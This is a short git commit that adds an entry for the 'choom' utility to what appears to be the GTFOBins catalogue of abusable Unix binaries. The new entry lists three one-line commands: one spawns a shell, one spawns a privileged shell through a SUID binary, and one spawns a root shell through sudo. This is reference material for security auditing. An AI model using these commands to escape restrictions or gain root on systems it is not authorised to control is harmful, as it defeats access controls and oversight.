Add choom

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Miguel R 2022-05-13 09:28:11 +02:00 committed by GitHub
parent 720cc73c7e
commit 58bca80e6c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

9
_gtfobins/choom.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: choom -n 0 /bin/sh
suid:
- code: ./choom -n 0 -- /bin/sh -p
sudo:
- code: sudo choom -n 0 /bin/sh
---